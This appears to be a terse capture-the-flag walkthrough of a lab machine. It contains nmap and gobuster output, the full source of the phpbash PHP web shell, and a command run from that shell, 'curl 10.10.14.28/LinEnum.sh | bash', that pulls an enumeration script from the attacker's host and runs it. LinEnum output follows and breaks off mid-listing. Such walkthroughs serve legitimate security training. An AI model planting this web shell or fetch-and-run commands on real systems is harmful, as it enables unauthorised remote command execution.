1

nmap -sC -sV -oA initial 10.10.10.68

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

# Nmap 7.92 scan initiated Sat Jan 29 13:18:07 2022 as: nmap -sC -sV -oA initial 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.018s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 29 13:18:15 2022 -- 1 IP address (1 host up) scanned in 7.39 seconds

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285

<?php
/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
    foreach ($output as $line) {
        echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
    }
    die(); 
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
    $filename = $_FILES["file"]["name"];
    $path = $_POST['path'];
    if ($path != "/") {
        $path .= "/";
    } 
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
        echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
    } else {
        echo "Error uploading " . htmlentities($filename);
    }
    die();
}
?>

<html>
    <head>
        <title></title>
        <style>
            html, body {
                max-width: 100%;
            }
        
            body {
                width: 100%;
                height: 100%;
                margin: 0;
                background: #000;
            }
            
            body, .inputtext {
                font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
                font-size: 14px;
                font-style: normal;
                font-variant: normal;
                font-weight: 400;
                line-height: 20px;
                overflow: hidden;
            }
        
            .console {
                width: 100%;
                height: 100%;
                margin: auto;
                position: absolute;
                color: #fff;
            }
            
            .output {
                width: auto;
                height: auto;
                position: absolute;
                overflow-y: scroll;
                top: 0;
                bottom: 30px;
                left: 5px;
                right: 0;
                line-height: 20px;
            }
                                 
            .input form {
                position: relative;
                margin-bottom: 0px;
            }
                     
            .username {
                height: 30px;
                width: auto;
                padding-left: 5px;
                line-height: 30px;
                float: left;
            }

            .input {
                border-top: 1px solid #333333;
                width: 100%;
                height: 30px;
                position: absolute;
                bottom: 0;
            }

            .inputtext {
                width: auto;
                height: 30px;
                bottom: 0px;
                margin-bottom: 0px;
                background: #000;
                border: 0;
                float: left;
                padding-left: 8px;
                color: #fff;
            }
            
            .inputtext:focus {
                outline: none;
            }

            ::-webkit-scrollbar {
                width: 12px;
            }

            ::-webkit-scrollbar-track {
                background: #101010;
            }

            ::-webkit-scrollbar-thumb {
                background: #303030; 
            }
        </style>
    </head>
    <body>
        <div class="console">
            <div class="output" id="output"></div>
            <div class="input" id="input">
                <form id="form" method="GET" onSubmit="sendCommand()">
                    <div class="username" id="username"></div>
                    <input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
                </form>
            </div>
        </div>
        <form id="upload" method="POST" style="display: none;">
            <input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
        </form>
        <script type="text/javascript">
            var username = "";
            var hostname = "";
            var currentDir = "";
            var previousDir = "";
            var defaultDir = "";
            var commandHistory = [];
            var currentCommand = 0;
            var inputTextElement = document.getElementById('inputtext');
            var inputElement = document.getElementById("input");
            var outputElement = document.getElementById("output");
            var usernameElement = document.getElementById("username");
            var uploadFormElement = document.getElementById("upload");
            var fileBrowserElement = document.getElementById("filebrowser");
            getShellInfo();
            
            function getShellInfo() {
                var request = new XMLHttpRequest();
                
                request.onreadystatechange = function() {
                    if (request.readyState == XMLHttpRequest.DONE) {
                        var parsedResponse = request.responseText.split("<br>");
                        username = parsedResponse[0];
                        hostname = parsedResponse[1];
                        currentDir =  parsedResponse[2].replace(new RegExp("&sol;", "g"), "/");
                        defaultDir = currentDir;
                        usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
                        updateInputWidth();
                    }
                };

                request.open("POST", "", true);
                request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                request.send("cmd=whoami; hostname; pwd");
            }
                        
            function sendCommand() {
                var request = new XMLHttpRequest();
                var command = inputTextElement.value;
                var originalCommand = command;
                var originalDir = currentDir;
                var cd = false;
                
                commandHistory.push(originalCommand);
                switchCommand(commandHistory.length);
                inputTextElement.value = "";

                var parsedCommand = command.split(" ");
                
                if (parsedCommand[0] == "cd") {
                    cd = true;
                    if (parsedCommand.length == 1) {
                        command = "cd "+defaultDir+"; pwd";
                    } else if (parsedCommand[1] == "-") {
                        command = "cd "+previousDir+"; pwd";
                    } else {
                        command = "cd "+currentDir+"; "+command+"; pwd";
                    }
                    
                } else if (parsedCommand[0] == "clear") {
                    outputElement.innerHTML = "";
                    return false;
                } else if (parsedCommand[0] == "upload") {
                    fileBrowserElement.click();
                    return false;
                } else {
                    command = "cd "+currentDir+"; " + command;
                }
                
                request.onreadystatechange = function() {
                    if (request.readyState == XMLHttpRequest.DONE) {
                        if (cd) {
                            var parsedResponse = request.responseText.split("<br>");
                            previousDir = currentDir;
                            currentDir = parsedResponse[0].replace(new RegExp("&sol;", "g"), "/");
                            outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
                            usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
                        } else {
                            outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
                            outputElement.scrollTop = outputElement.scrollHeight;
                        } 
                        updateInputWidth();
                    }
                };

                request.open("POST", "", true);
                request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                request.send("cmd="+encodeURIComponent(command));
                return false;
            }
            
            function uploadFile() {
                var formData = new FormData();
                formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
                formData.append('path', currentDir);
                
                var request = new XMLHttpRequest();
                
                request.onreadystatechange = function() {
                    if (request.readyState == XMLHttpRequest.DONE) {
                        outputElement.innerHTML += request.responseText+"<br>";
                    }
                };

                request.open("POST", "", true);
                request.send(formData);
                outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
            }
            
            function updateInputWidth() {
                inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
            }
            
            document.onkeydown = checkForArrowKeys;

            function checkForArrowKeys(e) {
                e = e || window.event;

                if (e.keyCode == '38') {
                    previousCommand();
                } else if (e.keyCode == '40') {
                    nextCommand();
                }
            }
            
            function previousCommand() {
                if (currentCommand != 0) {
                    switchCommand(currentCommand-1);
                }
            }
            
            function nextCommand() {
                if (currentCommand != commandHistory.length) {
                    switchCommand(currentCommand+1);
                }
            }
            
            function switchCommand(newCommand) {
                currentCommand = newCommand;

                if (currentCommand == commandHistory.length) {
                    inputTextElement.value = "";
                } else {
                    inputTextElement.value = commandHistory[currentCommand];
                    setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0);
                }
            }
            
            document.getElementById("form").addEventListener("submit", function(event){
                event.preventDefault()
            });
        </script>
    </body>
</html>

1

gobuster dir -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

1
2
3
4
5
6
7

/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]    
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]    
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]    
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]     
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]

1

git clone https://github.com/rebootuser/LinEnum

1

python  -m SimpleHTTPServer 80  # In the attacing machine

1
2
3

# In 10.10.10.68/dev/phpbash.php

curl 10.10.14.28/LinEnum.sh | bash

1
2
3

which curl # No curl

which wget # Yes curl

1

wget 10.10.14.28/LinEnum.sh

1
2
3
4
5

cd /dev/shm

wget 10.10.14.28/LinEnum.sh

bash LinEnum.sh # To run the command

   1
   2
   3
   4
   5
   6
   7
   8
   9
  10
  11
  12
  13
  14
  15
  16
  17
  18
  19
  20
  21
  22
  23
  24
  25
  26
  27
  28
  29
  30
  31
  32
  33
  34
  35
  36
  37
  38
  39
  40
  41
  42
  43
  44
  45
  46
  47
  48
  49
  50
  51
  52
  53
  54
  55
  56
  57
  58
  59
  60
  61
  62
  63
  64
  65
  66
  67
  68
  69
  70
  71
  72
  73
  74
  75
  76
  77
  78
  79
  80
  81
  82
  83
  84
  85
  86
  87
  88
  89
  90
  91
  92
  93
  94
  95
  96
  97
  98
  99
 100
 101
 102
 103
 104
 105
 106
 107
 108
 109
 110
 111
 112
 113
 114
 115
 116
 117
 118
 119
 120
 121
 122
 123
 124
 125
 126
 127
 128
 129
 130
 131
 132
 133
 134
 135
 136
 137
 138
 139
 140
 141
 142
 143
 144
 145
 146
 147
 148
 149
 150
 151
 152
 153
 154
 155
 156
 157
 158
 159
 160
 161
 162
 163
 164
 165
 166
 167
 168
 169
 170
 171
 172
 173
 174
 175
 176
 177
 178
 179
 180
 181
 182
 183
 184
 185
 186
 187
 188
 189
 190
 191
 192
 193
 194
 195
 196
 197
 198
 199
 200
 201
 202
 203
 204
 205
 206
 207
 208
 209
 210
 211
 212
 213
 214
 215
 216
 217
 218
 219
 220
 221
 222
 223
 224
 225
 226
 227
 228
 229
 230
 231
 232
 233
 234
 235
 236
 237
 238
 239
 240
 241
 242
 243
 244
 245
 246
 247
 248
 249
 250
 251
 252
 253
 254
 255
 256
 257
 258
 259
 260
 261
 262
 263
 264
 265
 266
 267
 268
 269
 270
 271
 272
 273
 274
 275
 276
 277
 278
 279
 280
 281
 282
 283
 284
 285
 286
 287
 288
 289
 290
 291
 292
 293
 294
 295
 296
 297
 298
 299
 300
 301
 302
 303
 304
 305
 306
 307
 308
 309
 310
 311
 312
 313
 314
 315
 316
 317
 318
 319
 320
 321
 322
 323
 324
 325
 326
 327
 328
 329
 330
 331
 332
 333
 334
 335
 336
 337
 338
 339
 340
 341
 342
 343
 344
 345
 346
 347
 348
 349
 350
 351
 352
 353
 354
 355
 356
 357
 358
 359
 360
 361
 362
 363
 364
 365
 366
 367
 368
 369
 370
 371
 372
 373
 374
 375
 376
 377
 378
 379
 380
 381
 382
 383
 384
 385
 386
 387
 388
 389
 390
 391
 392
 393
 394
 395
 396
 397
 398
 399
 400
 401
 402
 403
 404
 405
 406
 407
 408
 409
 410
 411
 412
 413
 414
 415
 416
 417
 418
 419
 420
 421
 422
 423
 424
 425
 426
 427
 428
 429
 430
 431
 432
 433
 434
 435
 436
 437
 438
 439
 440
 441
 442
 443
 444
 445
 446
 447
 448
 449
 450
 451
 452
 453
 454
 455
 456
 457
 458
 459
 460
 461
 462
 463
 464
 465
 466
 467
 468
 469
 470
 471
 472
 473
 474
 475
 476
 477
 478
 479
 480
 481
 482
 483
 484
 485
 486
 487
 488
 489
 490
 491
 492
 493
 494
 495
 496
 497
 498
 499
 500
 501
 502
 503
 504
 505
 506
 507
 508
 509
 510
 511
 512
 513
 514
 515
 516
 517
 518
 519
 520
 521
 522
 523
 524
 525
 526
 527
 528
 529
 530
 531
 532
 533
 534
 535
 536
 537
 538
 539
 540
 541
 542
 543
 544
 545
 546
 547
 548
 549
 550
 551
 552
 553
 554
 555
 556
 557
 558
 559
 560
 561
 562
 563
 564
 565
 566
 567
 568
 569
 570
 571
 572
 573
 574
 575
 576
 577
 578
 579
 580
 581
 582
 583
 584
 585
 586
 587
 588
 589
 590
 591
 592
 593
 594
 595
 596
 597
 598
 599
 600
 601
 602
 603
 604
 605
 606
 607
 608
 609
 610
 611
 612
 613
 614
 615
 616
 617
 618
 619
 620
 621
 622
 623
 624
 625
 626
 627
 628
 629
 630
 631
 632
 633
 634
 635
 636
 637
 638
 639
 640
 641
 642
 643
 644
 645
 646
 647
 648
 649
 650
 651
 652
 653
 654
 655
 656
 657
 658
 659
 660
 661
 662
 663
 664
 665
 666
 667
 668
 669
 670
 671
 672
 673
 674
 675
 676
 677
 678
 679
 680
 681
 682
 683
 684
 685
 686
 687
 688
 689
 690
 691
 692
 693
 694
 695
 696
 697
 698
 699
 700
 701
 702
 703
 704
 705
 706
 707
 708
 709
 710
 711
 712
 713
 714
 715
 716
 717
 718
 719
 720
 721
 722
 723
 724
 725
 726
 727
 728
 729
 730
 731
 732
 733
 734
 735
 736
 737
 738
 739
 740
 741
 742
 743
 744
 745
 746
 747
 748
 749
 750
 751
 752
 753
 754
 755
 756
 757
 758
 759
 760
 761
 762
 763
 764
 765
 766
 767
 768
 769
 770
 771
 772
 773
 774
 775
 776
 777
 778
 779
 780
 781
 782
 783
 784
 785
 786
 787
 788
 789
 790
 791
 792
 793
 794
 795
 796
 797
 798
 799
 800
 801
 802
 803
 804
 805
 806
 807
 808
 809
 810
 811
 812
 813
 814
 815
 816
 817
 818
 819
 820
 821
 822
 823
 824
 825
 826
 827
 828
 829
 830
 831
 832
 833
 834
 835
 836
 837
 838
 839
 840
 841
 842
 843
 844
 845
 846
 847
 848
 849
 850
 851
 852
 853
 854
 855
 856
 857
 858
 859
 860
 861
 862
 863
 864
 865
 866
 867
 868
 869
 870
 871
 872
 873
 874
 875
 876
 877
 878
 879
 880
 881
 882
 883
 884
 885
 886
 887
 888
 889
 890
 891
 892
 893
 894
 895
 896
 897
 898
 899
 900
 901
 902
 903
 904
 905
 906
 907
 908
 909
 910
 911
 912
 913
 914
 915
 916
 917
 918
 919
 920
 921
 922
 923
 924
 925
 926
 927
 928
 929
 930
 931
 932
 933
 934
 935
 936
 937
 938
 939
 940
 941
 942
 943
 944
 945
 946
 947
 948
 949
 950
 951
 952
 953
 954
 955
 956
 957
 958
 959
 960
 961
 962
 963
 964
 965
 966
 967
 968
 969
 970
 971
 972
 973
 974
 975
 976
 977
 978
 979
 980
 981
 982
 983
 984
 985
 986
 987
 988
 989
 990
 991
 992
 993
 994
 995
 996
 997
 998
 999
1000
1001
1002
1003
1004
1005
1006
1007
1008
1009
1010
1011
1012
1013
1014
1015
1016
1017
1018
1019
1020
1021
1022
1023
1024
1025
1026
1027
1028
1029
1030
1031
1032
1033
1034
1035
1036
1037
1038
1039
1040
1041
1042
1043
1044
1045
1046
1047
1048
1049
1050
1051
1052
1053
1054
1055
1056
1057
1058
1059
1060
1061
1062
1063
1064
1065
1066
1067
1068
1069
1070
1071
1072
1073
1074
1075
1076
1077
1078
1079
1080
1081
1082
1083
1084
1085
1086
1087
1088
1089
1090
1091
1092
1093
1094
1095
1096
1097
1098
1099
1100
1101
1102
1103
1104
1105
1106
1107
1108
1109
1110
1111
1112
1113
1114
1115
1116
1117
1118
1119
1120
1121
1122
1123
1124
1125
1126
1127
1128
1129
1130
1131
1132
1133
1134
1135
1136
1137
1138
1139
1140
1141
1142
1143
1144
1145
1146
1147
1148
1149
1150
1151
1152

[00;31m#########################################################[00m
[00;31m#[00m [00;33mLocal Linux Enumeration & Privilege Escalation Script[00m [00;31m#[00m
[00;31m#########################################################[00m
[00;33m# www.rebootuser.com[00m
[00;33m# version 0.982[00m

[-] Debug Info
[00;33m[+] Thorough tests = Disabled[00m


[00;33mScan started at:
Sat Jan 29 11:39:45 PST 2022
[00m

[00;33m### SYSTEM ##############################################[00m
[00;31m[-] Kernel information:[00m
Linux bashed 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


[00;31m[-] Kernel information (continued):[00m
Linux version 4.4.0-62-generic (buildd@lcy01-30) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017


[00;31m[-] Specific release information:[00m
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


[00;31m[-] Hostname:[00m
bashed


[00;33m### USER/GROUP ##########################################[00m
[00;31m[-] Current user/group info:[00m
uid=33(www-data) gid=33(www-data) groups=33(www-data)


[00;31m[-] Users that have previously logged onto the system:[00m
Username Port From Latest
arrexel tty1 Sat Dec 23 20:20:46 -0800 2017


[00;31m[-] Who else is logged on:[00m
11:39:45 up 1:23, 0 users, load average: 0.00, 0.01, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT


[00;31m[-] Group memberships:[00m
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=105(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(uuidd) gid=111(uuidd) groups=111(uuidd)
uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)


[00;31m[-] It looks like we have some admin users:[00m
uid=104(syslog) gid=108(syslog) groups=108(syslog),4(adm)
uid=1000(arrexel) gid=1000(arrexel) groups=1000(arrexel),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),114(lpadmin),115(sambashare)


[00;31m[-] Contents of /etc/passwd:[00m
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync❌100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network❌101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve❌102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy❌103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog❌104:108::/home/syslog:/bin/false
_apt❌105:65534::/nonexistent:/bin/false
messagebus❌106:110::/var/run/dbus:/bin/false
uuidd❌107:111::/run/uuidd:/bin/false
arrexel❌1000:1000:arrexel,,,:/home/arrexel:/bin/bash
scriptmanager❌1001:1001:,,,:/home/scriptmanager:/bin/bash


[00;31m[-] Super user account(s):[00m
root


[00;33m[+] We can sudo without supplying a password![00m
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL


[00;31m[-] Accounts that have recently used sudo:[00m
/home/arrexel/.sudo_as_admin_successful


[00;31m[-] Are permissions on /home directories lax:[00m
total 16K
drwxr-xr-x 4 root root 4.0K Dec 4 2017 .
drwxr-xr-x 23 root root 4.0K Dec 4 2017 ..
drwxr-xr-x 4 arrexel arrexel 4.0K Dec 4 2017 arrexel
drwxr-xr-x 3 scriptmanager scriptmanager 4.0K Dec 4 2017 scriptmanager


[00;33m### ENVIRONMENTAL #######################################[00m
[00;31m[-] Environment information:[00m
APACHE_PID_FILE=/var/run/apache2/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PWD=/dev/shm
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env


[00;31m[-] Path information:[00m
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
drwxr-xr-x 2 root root 4096 Dec 4 2017 /bin
drwxr-xr-x 2 root root 4096 Dec 4 2017 /sbin
drwxr-xr-x 2 root root 20480 Dec 4 2017 /usr/bin
drwxr-xr-x 2 root root 4096 Feb 15 2017 /usr/local/bin
drwxr-xr-x 2 root root 4096 Feb 15 2017 /usr/local/sbin
drwxr-xr-x 2 root root 4096 Dec 4 2017 /usr/sbin


[00;31m[-] Available shells:[00m
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash


[00;31m[-] Current umask value:[00m
0022
u=rwx,g=rx,o=rx


[00;31m[-] umask value as specified in /etc/login.defs:[00m
UMASK 022


[00;31m[-] Password and storage information:[00m
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512


[00;33m### JOBS/TASKS ##########################################[00m
[00;31m[-] Cron jobs:[00m
-rw-r--r-- 1 root root 722 Apr 5 2016 /etc/crontab

/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rw-r--r-- 1 root root 670 Mar 1 2016 php
-rw-r--r-- 1 root root 191 Dec 4 2017 popularity-contest

/etc/cron.daily:
total 48
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 539 Apr 5 2016 apache2
-rwxr-xr-x 1 root root 1474 Jan 17 2017 apt-compat
-rwxr-xr-x 1 root root 355 May 22 2012 bsdmainutils
-rwxr-xr-x 1 root root 1597 Nov 26 2015 dpkg
-rwxr-xr-x 1 root root 372 May 5 2015 logrotate
-rwxr-xr-x 1 root root 1293 Nov 6 2015 man-db
-rwxr-xr-x 1 root root 435 Nov 17 2014 mlocate
-rwxr-xr-x 1 root root 249 Nov 12 2015 passwd
-rwxr-xr-x 1 root root 3449 Feb 26 2016 popularity-contest

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Dec 4 2017 .
drwxr-xr-x 89 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 root root 102 Apr 5 2016 .placeholder
-rwxr-xr-x 1 root root 86 Apr 13 2016 fstrim
-rwxr-xr-x 1 root root 771 Nov 6 2015 man-db


[00;31m[-] Crontab contents:[00m
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


[00;31m[-] Anything interesting in /var/spool/cron/crontabs:[00m
total 0
d????????? ? ? ? ? ? .
d????????? ? ? ? ? ? ..
-????????? ? ? ? ? ? root


[00;31m[-] Systemd timers:[00m
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sat 2022-01-29 18:09:40 PST 6h left Sat 2022-01-29 10:15:56 PST 1h 23min ago apt-daily.timer apt-daily.service
Sun 2022-01-30 10:30:56 PST 22h left Sat 2022-01-29 10:30:56 PST 1h 8min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service

2 timers listed.
[2mEnable thorough tests to see inactive timers[00m


[00;33m### NETWORKING ##########################################[00m
[00;31m[-] Network and IP info:[00m
ens33 Link encap:Ethernet HWaddr 00:50:56:b9:89:fa
inet addr:10.10.10.68 Bcast:10.10.10.255 Mask:255.255.255.255
inet6 addr: fe80::250:56ff:feb9:89fa/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:205649 errors:0 dropped:69 overruns:0 frame:0
TX packets:201739 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:32067305 (32.0 MB) TX bytes:99906403 (99.9 MB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:26792 errors:0 dropped:0 overruns:0 frame:0
TX packets:26792 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:1984408 (1.9 MB) TX bytes:1984408 (1.9 MB)


[00;31m[-] ARP history:[00m
? (10.10.10.2) at 00:50:56:b9:2e:45 [ether] on ens33


[00;31m[-] Default route:[00m
default 10.10.10.2 0.0.0.0 UG 0 0 0 ens33


[00;31m[-] Listening TCP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp6 0 0 :::80 :::* LISTEN -


[00;31m[-] Listening UDP:[00m
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name


[00;33m### SERVICES #############################################[00m
[00;31m[-] Running processes:[00m
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
